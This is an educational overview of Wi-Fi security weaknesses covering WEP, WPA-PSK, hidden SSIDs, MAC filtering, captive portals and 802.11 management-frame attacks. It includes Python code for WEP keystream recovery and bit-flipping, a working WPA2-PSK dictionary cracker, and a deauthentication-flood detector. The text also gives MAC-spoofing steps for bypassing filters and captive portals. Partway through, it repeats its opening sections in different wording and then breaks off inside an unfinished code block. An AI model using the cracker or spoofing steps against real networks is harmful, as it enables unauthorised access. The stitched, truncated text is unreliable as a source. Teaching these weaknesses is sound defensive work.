Weaknesses and Threats in Wi-Fi (Wireless Fidelity) Networks
Security is an important issue in computer networks, and especially in wireless networks. The wide range of vendors offering wireless products at affordable prices has driven the widespread adoption of wireless technology. It is no longer limited to office or business users: home users also rely on it for easy connectivity.
This paper is intended to give an overview of the threats to wireless networks together with quick and simple ways to secure them. As noted above, wireless technology is comparatively more exposed to security problems. As the name implies, it uses radio waves as the transmission medium, and securing the network is harder because you cannot see the radio waves that carry the data: anyone within range can receive them.
Weaknesses of wireless networks can generally be divided into two types: configuration weaknesses and weaknesses in the type of encryption used. Configuration weaknesses stem from how easy it has become to set up a wireless network. Many vendors make installation so convenient for the user or network administrator that wireless networks are frequently found still running the vendor's default configuration: the default SSID, the default IP address, remote management enabled, DHCP enabled, the default channel, no encryption, and even the factory-default username and password for the administration interface.
WEP (Wired Equivalent Privacy) was the earlier wireless security standard; it can be broken easily with a variety of tools that are available free on the Internet. WPA-PSK was introduced as the replacement for WEP, but it too can be broken, by an offline dictionary attack against a captured handshake.
Some weaknesses in wireless networks that an attacker can use include the following:
1. Security Gaps
Many wireless network users have no idea what kind of dangers they are exposed to through a wireless access point (WAP), for instance that the WLAN signal can be received and infiltrated by an attacker. The following are threats to wireless networks:
- Sniffing to Eavesdrop
Packets carrying data such as HTTP, e-mail and so on travel over the air and can easily be captured and analysed by an attacker with a packet sniffer such as Kismet.
- Denial of Service Attack
This type of attack floods the network so that wireless transmissions collide and produce corrupted packets.
- Man in the Middle Attack
Even with encryption and authentication in place, an attacker can still get in by finding a weakness in how the network protocols operate. One example is exploiting the Address Resolution Protocol (ARP) in TCP/IP (ARP spoofing), which lets a skilled attacker redirect and take over traffic on the wireless network.
- Rogue / Unauthorized Access Point
A rogue AP can be installed by someone who wants to relay or retransmit wireless traffic without authorization. The attacker's goal is to infiltrate the network through this unauthorized AP.
- Incorrectly Configured Access Point
This is very common and is usually due to a lack of understanding of how to configure the AP's security settings.
Activities that threaten wireless network security are carried out using techniques known as warchalking, wardriving, warflying, warspamming or warspying. The number of access points / base stations that have been deployed, together with the low cost of an Internet subscription, has made hacking a common way of obtaining Internet access illegally, without having to pay for it of course.
2. Hidden SSID
Many administrators hide the Service Set Identifier (SSID) of their wireless network, intending that only those who know the SSID can connect to it. This is not a real protection, because the SSID is not perfectly hidden. At certain moments, in particular when a client connects (associates) to the network, or reconnects after being dropped (deauthentication), the client sends the SSID in plain text in its probe and association requests (even when encryption is used), so anyone who is listening can obtain it easily. Tools that can be used to obtain a hidden SSID include Kismet (KisMAC on Mac OS), ssid_jack (part of AirJack), aircrack and many others. Below is a Kismet screenshot of such a capture.
3. WEP
Wired Equivalent Privacy (WEP) is one of the most widely used encryption standards. However, WEP's encryption is vulnerable to a disturbing degree; this security hole is very dangerous. No important data can pass over it safely: everything that has been encrypted with WEP can be decrypted by an intruder. WEP's weaknesses include:
• Weak keys: the RC4 key scheduling produces weak (IV, key) combinations from which the key can be recovered.
• WEP uses static keys.
• The Initialization Vector (IV) is too short (24 bits) and is reused.
• Message integrity relies on a Cyclic Redundancy Check (CRC-32), which is linear and gives no protection against bit flipping.
WEP comes in two key lengths, 64-bit and 128-bit. Of the 64-bit WEP key, the secret key is actually only 40 bits; the remaining 24 bits are the Initialization Vector (IV). Likewise, the 128-bit WEP key consists of a 104-bit secret key plus the 24-bit IV.
Every packet sent with WEP consists of the IV (in the clear) followed by the encrypted data, which includes a checksum (the ICV, used to check whether the data was altered in transit). WEP's weak point lies in the 24-bit IV length. The sender concatenates the IV and the WEP key to seed RC4, which produces the keystream that encrypts the packet before it is sent over the WLAN. The receiver reconstructs the data using the IV from the packet and the pre-shared WEP key. The WEP standard recommends that a different IV be used for every packet. Unfortunately, not all manufacturers do so.
The WEP standard also does not specify how the IV should be generated. In general a random generator is used, and with a 24-bit value it is certain that sooner or later the same IV will be used again. Researchers estimate that an IV repeats roughly every 4,000 to 5,000 packets (the birthday bound for a 24-bit space). Once the intruder understands how WEP works, he only needs to collect enough packets: IV collisions reveal reused keystream, and statistical attacks on the weak IVs then recover the WEP key, after which he can enter the network and do anything he likes on it. The software to do all this can be obtained free on the Internet; with a little additional knowledge and practice, breaking WEP encryption is easy, and armed with the software anyone can learn to be an intruder.
The attack above takes time and a sufficient number of packets. To shorten the time, attackers usually perform traffic injection, most often by capturing an encrypted ARP packet and replaying it to the access point; every reply carries a new IV, so IVs are collected much faster. Unlike passive capture, traffic injection requires hardware and software that support packet injection, which is not always easy to find: a suitable chipset, firmware version and driver version, and not infrequently patched drivers and applications.
Packet capture can be done with airodump. Below is an example of airodump capturing WLAN packets. After enough data has been captured, the cracking process is run to find the WEP key; aircrack is the application used to break WEP encryption. Below is an example of aircrack successfully recovering the WEP key.
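The three WEP weaknesses described above (IV reuse exposing the RC4 keystream, the linear CRC-32 ICV, and how quickly a 24-bit IV repeats) can be reproduced on constructed packets. The following is an added example, not code from the paper or from the aircrack suite; the key, IV and packet contents are made up for the demonstration, and the RC4 and WEP framing are implemented from the standard.

```python
"""WEP on constructed packets: RC4 keystream reuse on an IV collision, CRC-32
ICV malleability, and the birthday bound that makes 24-bit IVs repeat early."""
import math
import struct
import zlib

IV_BITS = 24


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA); WEP seeds it with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (clear) || RC4(IV || key) XOR (plaintext || ICV)."""
    assert len(iv) == 3 and len(secret_key) in (5, 13)   # 40- or 104-bit key
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + secret_key, len(body)))


def wep_decrypt(secret_key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok); a real receiver drops frames with a bad ICV."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + secret_key, len(ct)))
    plaintext, tag = body[:-4], body[-4:]
    return plaintext, tag == icv(plaintext)


def recover_with_iv_reuse(known_frame: bytes, known_plaintext: bytes, target_frame: bytes) -> bytes:
    """Two frames under one IV share a keystream, so C1 XOR C2 = P1 XOR P2.
    Knowing P1 (e.g. a predictable ARP request) yields the keystream and hence
    P2, without ever learning the WEP key."""
    assert known_frame[:3] == target_frame[:3], "needs an IV collision"
    assert len(known_frame) >= len(target_frame)
    keystream = xor(known_frame[3:], known_plaintext + icv(known_plaintext))
    return xor(target_frame[3:], keystream)[:-4]          # drop the target's ICV


def flip_bits(frame: bytes, offset: int, mask: bytes) -> bytes:
    """CRC-32 is linear: crc(P XOR D) = crc(P) XOR crc(D) XOR crc(0..0) for equal
    lengths, so chosen plaintext bits can be flipped through the ciphertext and
    the encrypted ICV patched so that the receiver still accepts the frame."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4                                       # plaintext length
    delta = bytearray(n)
    delta[offset:offset + len(mask)] = mask
    patched = xor(ct[:n], bytes(delta))
    icv_delta = zlib.crc32(bytes(delta)) ^ zlib.crc32(bytes(n))
    patched += xor(ct[n:], struct.pack("<I", icv_delta & 0xFFFFFFFF))
    return iv + patched


def iv_collision_probability(packets: int) -> float:
    """P(at least one repeated IV) after `packets` uniformly random 24-bit IVs."""
    return 1 - math.exp(-packets * (packets - 1) / (2 * (1 << IV_BITS)))


def packets_for_collision(prob: float = 0.5) -> int:
    """Packets needed before an IV repeat becomes more likely than not."""
    return math.ceil(math.sqrt(-2 * (1 << IV_BITS) * math.log(1 - prob)))


# Constructed demo values (not taken from any real capture).
KEY = bytes.fromhex("0102030405")          # 40-bit secret key
IV = bytes.fromhex("000001")
KNOWN = b"ARP request known"               # plaintext the attacker can predict
SECRET = b"secret email body"              # victim's other packet under the same IV

if __name__ == "__main__":
    f1, f2 = wep_encrypt(KEY, IV, KNOWN), wep_encrypt(KEY, IV, SECRET)
    print(recover_with_iv_reuse(f1, KNOWN, f2))
    print(wep_decrypt(KEY, flip_bits(f1, 12, b"\x20" * 5)))   # "known" -> "KNOWN", ICV still valid
    print(packets_for_collision(), iv_collision_probability(5000))
```

The collision estimate comes out at roughly 4,800 packets for a 50% chance of a repeat, which is why the 4,000 to 5,000 figure quoted above is the right order of magnitude even when the IV is chosen truly at random; sequential IV counters and the FMS-style weak IVs make the real-world picture worse, not better.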
4. WPA-PSK or WPA2-PSK
WPA was an interim security technology created to replace WEP. There are two variants: WPA Personal (WPA-PSK), which uses a pre-shared key, and WPA Enterprise (WPA-RADIUS), which authenticates users against a RADIUS server. It is already possible to crack WPA-PSK by an offline brute-force attack: the attacker captures the handshake between a client and the AP and then tries words from a dictionary one after another until one reproduces the captured handshake. The attack succeeds only if the passphrase used on the wireless network exists in the attacker's dictionary. To prevent attacks on WPA-PSK, use a passphrase that is long enough (a whole sentence) and is not a dictionary word.
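The offline dictionary attack just described is, concretely, a race to recompute the handshake MIC. The following is an added example, not code from the paper or from aircrack-ng: it derives the PMK and PTK exactly as IEEE 802.11i specifies (PBKDF2-HMAC-SHA1 over the SSID, then the PRF-512 key expansion) and checks candidate passphrases against the MIC of EAPOL-Key message 2. The SSID, MAC addresses, nonces and wordlist are constructed for the demonstration; the "captured" handshake is built here from a known passphrase rather than sniffed.

```python
"""Offline dictionary attack on a WPA2-PSK four-way handshake, using a handshake
constructed here (not captured): for each candidate passphrase derive PMK and
PTK and compare the EAPOL message-2 MIC. This is the work aircrack-ng does."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81    # MIC field offset inside an EAPOL-Key frame, counted from the 802.1X header


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2: descriptor type 2, key info 0x010a (v2, pairwise, MIC set)."""
    body = struct.pack(">BHH8s32s16s8s8s16sH", 2, 0x010A, 0, bytes(7) + b"\x01",
                       snonce, bytes(16), bytes(8), bytes(8), mic, 0)
    return struct.pack(">BBH", 1, 3, len(body)) + body     # 802.1X version 1, type 3 = EAPOL-Key


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wordlist):
    """Return the candidate whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


# Constructed handshake parameters; nothing here comes from a real network.
SSID = "LabWiFi"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "12345678", "wireless", "qwertyui", "letmein1"]


def constructed_capture(true_passphrase: str) -> bytes:
    """Stand-in for the sniffed message 2: the client's genuine MIC over the frame."""
    kck = derive_ptk(pmk_from_passphrase(true_passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))


def demo(true_passphrase: str):
    return crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, constructed_capture(true_passphrase), WORDLIST)


if __name__ == "__main__":
    print(demo("wireless"))                                  # in the wordlist: recovered
    print(demo("this passphrase is a whole sentence"))        # not in the wordlist: None
```

Each guess costs 4096 PBKDF2 iterations (8192 HMAC-SHA1 operations) plus the PTK expansion, and the SSID acts as the salt, so the same passphrase on a different SSID has to be recomputed; but this cost is fixed and fully parallel, which is why the only real defence is a passphrase no wordlist will contain.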
5. MAC Filtering
Almost every wireless access point or router offers MAC filtering as a security feature. In practice it does little to secure wireless communications, because a MAC address is very easy to spoof or even change outright. ifconfig or macchanger on Linux/Unix, and tools such as the network utilities, regedit or SMAC on Windows, make spoofing or changing a MAC address easy. Wi-Fi networks in offices, and even ISP hotspots (the kind usually found in cafes), are still found that rely on MAC filtering alone. Using wardriving tools such as Kismet, KisMAC or aircrack, the MAC addresses of every client connected to an access point can be collected. With this information, we change our own MAC address to match one of those clients and connect to the access point. On a wireless network a duplicated MAC address does not normally cause a conflict; all that is required is that the two clients use different IP addresses. Below is a list, obtained with Kismet, of the client MAC addresses connected to an access point. To change the MAC address of a network interface, simple tools such as MAC MakeUp are enough.
6. Captive Portal
Captive portals have become a popular mechanism for community networks and Wi-Fi hotspot services. They provide user authentication and per-IP flow management, such as traffic shaping and bandwidth control, without requiring any special software on the user's computer: authentication is performed through an ordinary web browser on the client side. Captive portals can also support secure access via SSL and IPsec and per-user quality-of-service (QoS) rules, while the Wi-Fi infrastructure itself keeps its open nature.
A captive portal is essentially a router or gateway that blocks all traffic until the user has registered or authenticated. It works as follows:
• A wireless client is allowed to associate and obtain an IP address (via DHCP).
• All traffic is blocked except traffic to the captive portal (the registration / web-based authentication server) located on the wired network.
• All web traffic is redirected to the captive portal.
• After the user registers or logs in, access to the network (the Internet) is allowed.
Below is an example of a captive portal login page.
The important thing to note is that a captive portal tracks authenticated clients only by their IP and MAC address. This makes it possible to use the portal without authenticating, because both the IP and the MAC address can be spoofed. The attack is carried out by IP and MAC spoofing: MAC spoofing as described above, while IP spoofing takes more effort, using ARP cache poisoning to redirect the traffic of a client that has already authenticated.
Another attack that is easy enough to carry out uses a rogue AP: an access point configured with the same parameters as the target AP (SSID, BSSID and channel). When a client connects to the AP we have set up, we can forward its traffic to the real AP and sit in the middle of the connection.
It is not rare for a captive portal deployed at a hotspot to have weaknesses in its network configuration or design: for example, authentication still uses plain text (HTTP), or the network management interface is reachable over the wireless side (it sits on the same network), and so on. Another weakness is that the user's traffic after authentication (once connected to the network) is still not encrypted and can easily be intercepted. We therefore need to be careful when connecting to a hotspot, and should use secure protocols such as HTTPS, POP3S, SSH, IMAPS and the like.
7. Wardriving
Wardriving is an electronic fishing expedition to find weak wireless networks. Most of these networks are not even protected by a password or encryption. The activity is carried out to search for networks that will become the target of an attack; once found, we can attack the networks we have targeted. It requires only simple equipment. It is generally done to obtain an Internet connection, but many people do it for other purposes, ranging from curiosity, experimentation, research and lab work to crime.
Application for site survey / wardriving: NetStumbler 0.4.0
The first step in attempting to exploit a wireless network is to find an access point. NetStumbler is a tool that can be used for this; it makes it easy to find wireless network signals, and it can also measure signal strength and noise, which determine how good the connectivity to a given access point is.
Results of scanning and analysing the WLANs around the student boarding houses near IT Telkom using NetStumbler:
Signal graph obtained with the tool for the SSID "ITTelkom":
8. Protocol Weaknesses in Wireless Networks
The weaknesses of wireless networks also come from weaknesses in the various protocols they use, among them:
8.1 EAPOL (Extensible Authentication Protocol over LAN)
EAPOL is the protocol commonly used for wireless (802.1X) authentication and for point-to-point connections. The legitimate client sends EAPOL packets to the AP; the AP receives them and responds, and with that the AP completes the authorization process. The EAPOL exchange has a gap that can be used to obtain the authentication values.
The authentication values appear only at the beginning of the legitimate client's communication with the AP. Once the client is connected, EAPOL packets no longer appear, except that the exchange reappears after about 10,000 packets. An attacker can inject EAPOL packets whose contents are spoofed so that the SSID, MAC address and IP address of the source / destination match those of the legitimate client.
The legitimate client sends an EAPOL packet to obtain a response from the AP for the authentication process; the AP then checks the client's "ID card" (its identity). The attacker exploits the protocol by presenting a forged ID card so that the AP lets him in and seats him in the same room as the legitimate client. Note that under WPA/WPA2 the session keys are derived from the pre-shared key and fresh nonces, so replaying a captured EAPOL exchange does not by itself yield a usable session; its main value to an attacker is that it provides the handshake for the offline dictionary attack described in section 4.
8.2 Beacon Management Frames
Beacon management frames are transmitted by every AP to announce its presence over RF. Capturing and decoding beacons shows that at every transmission a beacon carries information such as the SSID, encryption type, channel, MAC address (BSSID) and so on.
The weakness of this frame type is as follows. An attacker captures the beacon management frames emitted by the AP and then retransmits them himself. Typically an AP sends a beacon every 100 ms. If the attacker captures the AP's beacon and re-emits it, there are now two identical beacons with different senders but the same content: two APs advertising the same SSID and the same MAC address. As a result the client can no longer communicate properly with the real AP, until the attacker stops sending the copied beacons.
8.3 Deauthentication / Disassociation
The usual name for exploiting this gap is a Deauthentication Broadcast Attack. The attack floods the WLAN with deauthentication frames so that the wireless service for clients breaks down. It is the most dangerous type of attack because it disconnects the target client, or every client associated with the AP: the attacker sends disconnection requests using deauthentication / disassociation frames, which the AP and clients act on immediately because these management frames are neither authenticated nor encrypted. If an ISP is hit by this attack, it will receive a lot of customer complaints because the entire client network is cut off.
The application used for this attack is aireplay (part of the aircrack suite). Below is an example of aireplay performing a broadcast deauthentication attack.
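The hidden SSID weakness of section 2, the beacon contents of section 8.2 and the deauthentication flood of section 8.3 are all visible in raw 802.11 management frames. The following is an added example, not code from the paper or from Kismet or aircrack-ng: a small parser for beacon, probe response and deauthentication frames built with the standard library only, together with two checks a defender would run over a monitor-mode capture. The frames are constructed inline for the demonstration (the BSSID, client address and timestamps are made up; the SSID "ITTelkom" is borrowed from the survey above), and the deauthentication frames carry the AP's BSSID as source just as an attacker would spoof them.

```python
"""Constructed 802.11 management frames (not a real capture), parsed with the
standard library: what a beacon leaks, how a "hidden" SSID still shows up in the
AP's own probe responses, and how a deauthentication flood looks to a sniffer."""
import struct
from collections import Counter

BROADCAST = b"\xff" * 6
SUBTYPE = {"probe-req": 4, "probe-resp": 5, "beacon": 8, "disassoc": 10, "deauth": 12}
SUBTYPE_NAME = {v: k for k, v in SUBTYPE.items()}
RSN_IE = bytes.fromhex("0100000fac040100000fac040100000fac020000")   # CCMP, PSK

def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def ie(tag: int, value: bytes) -> bytes:
    """Information element: tag, length, value."""
    return bytes([tag, len(value)]) + value

def mgmt_header(subtype: str, da: bytes, sa: bytes, bssid: bytes) -> bytes:
    """24-byte MAC header; frame control = subtype << 4 with type 0 (management)."""
    return struct.pack("<HH6s6s6sH", SUBTYPE[subtype] << 4, 0, da, sa, bssid, 0)

def beacon_like(kind, bssid, ssid, channel, rsn=True, hidden=False, da=BROADCAST):
    """Beacon or probe response: timestamp, interval (100 TU), capability, IEs."""
    cap = 0x0011 if rsn else 0x0001              # ESS, plus the privacy bit when encrypted
    body = struct.pack("<QHH", 0, 100, cap)
    body += ie(0, b"" if hidden else ssid) + ie(3, bytes([channel]))
    if rsn:
        body += ie(48, RSN_IE)
    return mgmt_header(kind, da, bssid, bssid) + body

def deauth(bssid, target=BROADCAST, reason=7):
    """Deauthentication frame; reason 7 = class 3 frame from a non-associated station."""
    return mgmt_header("deauth", target, bssid, bssid) + struct.pack("<H", reason)

def parse_ies(data: bytes) -> dict:
    ies, i = {}, 0
    while i + 2 <= len(data):
        tag, ln = data[i], data[i + 1]
        ies[tag] = data[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies

def parse_mgmt(frame: bytes) -> dict:
    fc, _dur, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", frame[:24])
    if (fc >> 2) & 0x3 != 0:
        return {}                                 # only management frames are handled
    sub = (fc >> 4) & 0xF
    info = {"subtype": SUBTYPE_NAME.get(sub, sub), "da": mac(a1), "sa": mac(a2), "bssid": mac(a3)}
    body = frame[24:]
    if sub in (SUBTYPE["beacon"], SUBTYPE["probe-resp"]):
        _ts, interval, cap = struct.unpack("<QHH", body[:12])
        ies = parse_ies(body[12:])
        ssid = ies.get(0, b"")
        info.update(interval_ms=interval * 1.024, ssid=ssid.decode(errors="replace"),
                    hidden=not ssid.strip(b"\x00"), channel=ies[3][0] if 3 in ies else None,
                    security="WPA2/RSN" if 48 in ies else ("WEP or WPA" if cap & 0x10 else "open"))
    elif sub in (SUBTYPE["deauth"], SUBTYPE["disassoc"]):
        info["reason"] = struct.unpack("<H", body[:2])[0]
    return info

def reveal_hidden_ssids(frames) -> dict:
    """BSSIDs whose beacons hide the SSID, mapped to the SSID their probe responses leak."""
    hidden, leaked = set(), {}
    for f in map(parse_mgmt, frames):
        if f.get("subtype") == "beacon" and f.get("hidden"):
            hidden.add(f["bssid"])
        elif f.get("subtype") == "probe-resp" and f.get("ssid"):
            leaked[f["bssid"]] = f["ssid"]
    return {b: leaked[b] for b in hidden if b in leaked}

def deauth_flood(timed_frames, threshold=20) -> dict:
    """(bssid, second) buckets holding at least `threshold` deauth/disassoc frames."""
    counts = Counter()
    for ts, frame in timed_frames:
        f = parse_mgmt(frame)
        if f.get("subtype") in ("deauth", "disassoc"):
            counts[(f["bssid"], int(ts))] += 1
    return {k: n for k, n in counts.items() if n >= threshold}

# Constructed sample traffic: one AP hiding the SSID "ITTelkom" on channel 6,
# then 30 spoofed deauthentication frames within one second.
AP = bytes.fromhex("00112233aabb")
CLIENT = bytes.fromhex("66778899ccdd")
SAMPLE = [beacon_like("beacon", AP, b"ITTelkom", 6, hidden=True),
          beacon_like("probe-resp", AP, b"ITTelkom", 6, da=CLIENT)]
FLOOD = [(10.0 + i * 0.01, deauth(AP)) for i in range(30)]

if __name__ == "__main__":
    print(parse_mgmt(SAMPLE[0]))          # hidden SSID, channel 6, WPA2/RSN, 102.4 ms beacons
    print(reveal_hidden_ssids(SAMPLE))    # {'00:11:22:33:aa:bb': 'ITTelkom'}
    print(deauth_flood(FLOOD))            # {('00:11:22:33:aa:bb', 10): 30}
```

The beacon's empty SSID element is what a "hidden" network looks like; the probe response from the same BSSID carries the name in clear, and a client's probe or association request would do the same. The flood detector is the kind of rule a wireless IDS applies: a legitimate AP rarely sends more than a handful of deauthentication frames per second, so a burst of them with its BSSID as source is almost always an attacker.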
8.4 RF Signal Jamming
RF signals are electromagnetic waves used to exchange information over the air from one node to another. Today RF signals are widely used, for example for FM radio and television broadcasting and for sending data over wireless networks.
RF signals have advantages, but also weaknesses. They are easily disturbed by other external RF-based systems, such as cordless phones, microwave ovens, Bluetooth devices and others. When such devices are used at the same time, wireless network performance can drop significantly because they compete for the same medium. Ultimately such interference causes bit errors in the information being sent, leading to retransmissions and delays for the user.
8.5 Probe Request Management Frames
When a client first tries to connect to an AP, the AP answers the client's probe request, checking whether the client asking to join the wireless network is allowed or not. The gap an attacker can exploit is to manipulate this probe request / probe response exchange: the attacker sends as many probe requests as possible, for example 500 packets in one second, until the AP can no longer respond to them all. At that point the AP is no longer able to communicate with its other clients.
Weaknesses of wireless networks can generally be divided into 2 types, namely the configuration weaknesses and shortcomings on the type of encryption used. One example of the causes for weaknesses in the current configuration to build a wireless network quite easily. Many vendors that provide facilities that enable the user or network admin, so often found in wireless that still use the default wireless configuration innate vendors. Often mounted on the wireless network is still using the default settings such as SSID congenital vendors, IP Address, remote management, DHCP enabled, channel frequency, without encryption and even user / password for the administration is still the standard wireless built factory.
WEP (Wired Equivalent Privacy) is a wireless security standard before, when it could be easily solved with a variety of tools that are available for free on the internet. WPA-PSK is considered to be a solution to replace WEP, now also has to be solved by the method of offline dictionary attack.
Some weaknesses in wireless networks that can be used to attack the attacker, among others:
1. Security Gap
Many wireless network users have no idea of the dangers they are exposed to as soon as they associate with a wireless access point (WAP): the WLAN signal reaches beyond the walls and can be picked up and intruded upon by an attacker. The following are threats in wireless networks:
- Sniffing to Eavesdrop
Packets carrying data such as HTTP, e-mail and so on travel over the air and can easily be captured and analysed by an attacker using a packet sniffer such as Kismet.
- Denial of Service Attack
This type of attack is carried out by flooding the network so that wireless signals collide and produce corrupted packets.
- Man in the Middle Attack
Even security that has been improved with encryption and authentication can still be penetrated by finding a weakness in the way a network protocol operates. One way is to abuse the Address Resolution Protocol (ARP) in TCP/IP (ARP spoofing), with which a skilled attacker can take over traffic on the wireless network.
- Rogue / Unauthorized Access Point
A rogue AP can be installed by someone who wants to re-broadcast the wireless transmission illegally or without authorisation. The goal is that the attacker can infiltrate the network through this rogue AP.
- Incorrect access point configuration
This condition is very common, and is due to a lack of understanding of how to configure the AP's security.
The activities that threaten wireless network security above are carried out in ways known as Warchalking, WarDriving, WarFlying, WarSpamming or WarSpying. The number of access points/base stations being built, together with the low cost of an Internet subscription, means that hacking activity is often aimed at obtaining illegal Internet access, without having to pay for it.
2. Hide SSID
Many administrators hide the Service Set Identifier (SSID) of their wireless network in the belief that only someone who knows the SSID can connect to it. This is not true, because the SSID is not hidden perfectly. Hiding the SSID only removes it from the beacon frames: when a client connects (associates), its probe request and association request and the AP's probe response still carry the SSID in plaintext, whatever encryption is in use, and an attacker who does not want to wait can force a connected client to re-associate by sending it a deauthentication frame. So if we intend to eavesdrop, the information is easy to obtain. Some tools that can be used to get a hidden SSID include Kismet (KisMAC on Mac OS X), essid_jack from the AirJack suite, the aircrack-ng suite and many more. The following screenshot shows Kismet performing the sniffing.
3. WEP
Wired Equivalent Privacy (WEP) is one of the most widely used encryption standards. However, WEP's encryption is vulnerable enough to be a serious problem: this security hole is very dangerous, no important data can pass through it safely, and everything that has been encrypted can be recovered by an intruder. WEP's weaknesses include:
• Weak keys: the RC4 key scheduling leaks key bytes for certain IVs (the FMS weak-key attack), so the key can be recovered from captured traffic
• WEP uses static keys
• The Initialization Vector (IV) is only 24 bits and is reused
• Message integrity relies on a linear checksum, CRC-32, which is not a cryptographic MAC
WEP comes in two key lengths, 64-bit and 128-bit. In fact the secret key of 64-bit WEP is only 40 bits; the other 24 bits are the Initialization Vector (IV). Likewise, the secret key of 128-bit WEP is only 104 bits.
Basically, each data packet sent with WEP encryption consists of the IV (sent in clear) and the encrypted data, which ends with a checksum (the ICV, used to check whether the data was changed in transit). WEP's weak point lies in the IV being only 24 bits long. RC4 is seeded with the IV concatenated with the WEP key to produce the keystream that is XORed with the data before it is sent over the WLAN; the recipient reconstructs the data from the IV and the WEP key that has been configured. The WEP standard recommends that the IV be different for each data packet. Unfortunately, not all manufacturers do this.
The WEP standard also does not specify how the IV is to be generated. In general a random generator is used, and with a 24-bit IV it is certain that sooner or later the same IV will be used again: by the birthday bound a repeated IV is expected after roughly 4,000-5,000 packets. Two packets encrypted with the same IV and key share the same keystream, so XORing the two ciphertexts cancels it and leaves the XOR of the plaintexts; with any known plaintext the keystream is recovered and every other packet sent under that IV can be decrypted. To recover the key itself, the intruder collects enough packets with distinct IVs and runs a statistical attack on them (FMS/KoreK, or PTW in newer tools), after which the intruder can do anything on the wireless network. Software for all of this can be obtained free on the Internet. With a little additional knowledge and practice, breaking WEP encryption is easy; armed with the software, anyone can learn to be an intruder.
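To make the two weaknesses above concrete, here is an added example (not code from the original page): a toy WEP implementation with RC4 written inline. The 40-bit key, the IV, and the two payloads are constructed for the demonstration. It shows that a repeated IV lets an attacker who can guess one packet's contents (an ARP request, or just the constant LLC/SNAP header) decrypt every other packet sent under that IV, and that the CRC-32 ICV lets an attacker flip chosen bits in a ciphertext and still pass the integrity check, all without the key.

```python
"""Added example (not from the original page): toy WEP showing IV reuse and the
linear CRC-32 ICV. Keys, IVs and payloads are constructed. Standard library only."""
import zlib
from math import exp


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes for `key` (KSA followed by PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (clear) || RC4(IV || key) XOR (plaintext || CRC-32 ICV).
    A 40-bit key plus a 24-bit IV is what the page calls '64-bit WEP'."""
    assert len(iv) == 3 and len(wep_key) in (5, 13)
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + xor(plaintext + icv, rc4(iv + wep_key, len(plaintext) + 4))


def wep_decrypt(wep_key: bytes, body: bytes):
    """Return (plaintext, icv_ok) for a frame body produced by wep_encrypt."""
    iv, ct = body[:3], body[3:]
    pt = xor(ct, rc4(iv + wep_key, len(ct)))
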